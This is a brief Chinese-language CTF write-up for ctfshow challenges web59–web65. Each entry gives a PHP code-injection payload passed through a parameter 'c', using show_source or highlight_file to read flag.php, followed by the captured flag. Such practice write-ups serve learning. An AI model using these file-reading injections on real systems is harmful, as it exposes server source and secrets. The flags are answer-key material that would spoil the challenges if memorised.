目录
1、web59
2、web60
3、web61
4、web62
5、web63
6、web64
7、web65
都是使用 highlight_file 或者 show_source
1、web59
直接用上一题的 payload:
c=show_source('flag.php');
拿到 flag:ctfshow{9e058a62-f37d-425e-9696-43387b0b3629}
2、web60
过滤更多
还是使用 show_source()
c=show_source("flag.php");
拿到 flag:ctfshow{b275a543-cc93-4454-add2-c5f1826ddaca}
3、web61
这里 copy 、rename 也禁用了
还是使用高亮显示源码的函数
c=show_source("flag.php");
拿到 flag:ctfshow{905ea953-3623-4eb7-b3e3-5618db3b4cf7}
4、web62
还是用上一题的 payload:
c=show_source("flag.php");
拿到 flag:ctfshow{28bfa41b-3dad-4eef-a12e-cd88d644f620}
5、web63
c=highlight_file("flag.php");
ctfshow{745aa683-6a56-4793-a8d3-390249d6fc70}
6、web64
c=highlight_file("flag.php");
ctfshow{42817ff2-d650-430a-84e2-30b793c921b4}
7、web65
c=highlight_file("flag.php");
ctfshow{48c4f136-5c87-426b-812b-156a20870c11}
